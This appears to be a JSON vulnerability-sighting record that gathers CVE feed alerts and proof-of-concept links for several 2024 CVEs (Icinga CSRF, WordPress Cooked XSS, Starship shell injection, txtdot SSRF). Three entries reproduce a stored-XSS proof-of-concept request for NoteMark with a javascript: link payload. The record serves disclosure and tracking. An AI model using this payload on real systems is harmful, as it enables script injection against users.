{"vulnerability": "CVE-2024-4181", "sightings": [{"uuid": "f4b4afe2-dfe5-4ac2-991d-0080ab933d56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41817", "type": "published-proof-of-concept", "source": "Telegram/wPxuKkvaeObl7wP7fVpj1j1W_8mLNT5U7Q8iJzLFoolh0zg", "content": "", "creation_timestamp": "2025-06-21T21:00:05.000000Z"}, {"uuid": "28abea91-8e1f-4c51-b136-6a040e5ead17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41817", "type": "seen", "source": "https://gist.github.com/Darkcrai86/472fb135bb5239658540f47192b6d6d4", "content": "", "creation_timestamp": "2025-09-12T07:24:53.000000Z"}, {"uuid": "a140348d-b3d2-4df6-9f11-261a07e25d1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41817", "type": "seen", "source": "https://gist.github.com/strikoder/0c8243086aeaf01de0172a34af545827", "content": "", "creation_timestamp": "2025-12-30T08:47:34.000000Z"}, {"uuid": "a13ab460-600f-4563-b45a-95fef8814c19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41811", "type": "seen", "source": "https://t.me/cvedetector/2495", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-41811 - Icinga ipl/web CSRF Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-41811 \nPublished : Aug. 5, 2024, 9:15 p.m. | 40\u00a0minutes ago \nDescription : ipl/web is a set of common web components for php projects. Some of the recent development by Icinga is, under certain circumstances, susceptible to cross site request forgery. (CSRF). All affected products, in any version, will be unaffected by this once `icinga-php-library` is upgraded. Version 0.10.1 includes a fix for this. It will be published as part of the `icinga-php-library` v0.14.1 release. \nSeverity: 3.9 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-05T23:56:53.000000Z"}, {"uuid": "4e8271c9-caad-4589-9ad1-f2d2c40ad95f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41816", "type": "seen", "source": "https://t.me/cvedetector/2492", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-41816 - WordPress Cooked Persistent Cross-Site Scripting (XSS)\", \n  \"Content\": \"CVE ID : CVE-2024-41816 \nPublished : Aug. 5, 2024, 8:15 p.m. | 38\u00a0minutes ago \nDescription : Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the \u2018[cooked-timer]\u2019 shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.1. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-05T23:06:46.000000Z"}, {"uuid": "e377d28b-8ec0-49f7-bc9c-b9a877b6a262", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41815", "type": "seen", "source": "https://t.me/cvedetector/1722", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-41815 - Starship Bash Shell Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-41815 \nPublished : July 26, 2024, 9:15 p.m. | 34\u00a0minutes ago \nDescription : Starship is a cross-shell prompt. Starting in version 1.0.0 and prior to version 1.20.0, undocumented and unpredictable shell expansion and/or quoting rules make it easily to accidentally cause shell injection when using custom commands with starship in bash. This issue only affects users with custom commands, so the scope is limited, and without knowledge of others' commands, it could be hard to successfully target someone. Version 1.20.0 fixes the vulnerability. \nSeverity: 7.4 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"26 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-26T23:53:38.000000Z"}, {"uuid": "ba0bda6c-961e-4a9a-a4b7-070c86e7abcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41817", "type": "published-proof-of-concept", "source": "Telegram/wSGzmOjLrmEcQmMBXaHVXNxUHoaomU1r4hfeqWwSlXhrWUk", "content": "", "creation_timestamp": "2025-03-19T22:00:06.000000Z"}, {"uuid": "93bb5c14-7d32-48e9-86ce-d12d76ab1150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41813", "type": "seen", "source": "https://t.me/cvedetector/1702", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-41813 - Txtdot SSRF\", \n  \"Content\": \"CVE ID : CVE-2024-41813 \nPublished : July 26, 2024, 5:15 p.m. | 17\u00a0minutes ago \nDescription : txtdot is an HTTP proxy that parses only text, links, and pictures from pages, removing ads and heavy scripts. Starting in version 1.4.0 and prior to version 1.6.1, a Server-Side Request Forgery (SSRF) vulnerability in the `/proxy` route of txtdot allows remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network. Version 1.6.1 patches the issue. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"26 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-26T19:42:31.000000Z"}, {"uuid": "e8b67bc7-0657-4248-89ca-a58689158616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41812", "type": "seen", "source": "https://t.me/cvedetector/1697", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-41812 - \"txtdot SSRF Proxy\"\", \n  \"Content\": \"CVE ID : CVE-2024-41812 \nPublished : July 26, 2024, 5:15 p.m. | 17\u00a0minutes ago \nDescription : txtdot is an HTTP proxy that parses only text, links, and pictures from pages, removing ads and heavy scripts. Prior to version 1.7.0, a Server-Side Request Forgery (SSRF) vulnerability in the `/get` route of txtdot allows remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network. Version 1.7.0 prevents displaying the response of forged requests, but the requests can still be sent. For complete mitigation, a firewall between txtdot and other internal network resources should be set. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"26 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-26T19:42:23.000000Z"}, {"uuid": "ea2025ab-4084-4f97-a7e0-4b006fa91112", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41819", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/608", "content": "NoteMark &lt; 0.13.0 - Stored XSS  CVE-2024-41819\n\nPUT /api/notes//content HTTP/1.1\nHost: 127.1.1.1\nAccept: */*\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 34\nSec-Fetch-Site: same-origin\nAuthorization: Bearer \n\n\n[xss-link](javascript:alert(1))\n\n#exploit #poc #xss", "creation_timestamp": "2024-10-23T19:29:44.000000Z"}, {"uuid": "1ae6d76b-c1ca-4bf6-b769-8da3d6f56e76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41819", "type": "published-proof-of-concept", "source": "Telegram/qH6wx2SCvd6-Z7e5KctLJVx-gtH-x7J2L6wQtvPEeNko7RFN", "content": "", "creation_timestamp": "2024-10-24T12:41:42.000000Z"}, {"uuid": "6b75d495-2c9a-4639-b9c5-20ac2f6644c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41819", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3351", "content": "NoteMark &lt; 0.13.0 - Stored XSS  CVE-2024-41819\n\nPUT /api/notes//content HTTP/1.1\nHost: 127.1.1.1\nAccept: */*\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 34\nSec-Fetch-Site: same-origin\nAuthorization: Bearer \n\n\n[xss-link](javascript:alert(1))\n\n#exploit #poc #xss", "creation_timestamp": "2024-10-25T12:04:30.000000Z"}, {"uuid": "eaefd50e-bffe-4107-ade5-75afb917e1e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-41819", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/123", "content": "NoteMark &lt; 0.13.0 - Stored XSS  CVE-2024-41819\n\nPUT /api/notes//content HTTP/1.1\nHost: 127.1.1.1\nAccept: */*\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 34\nSec-Fetch-Site: same-origin\nAuthorization: Bearer \n\n\n[xss-link](javascript:alert(1))\n\n#exploit #poc #xss", "creation_timestamp": "2024-12-21T15:55:06.000000Z"}]}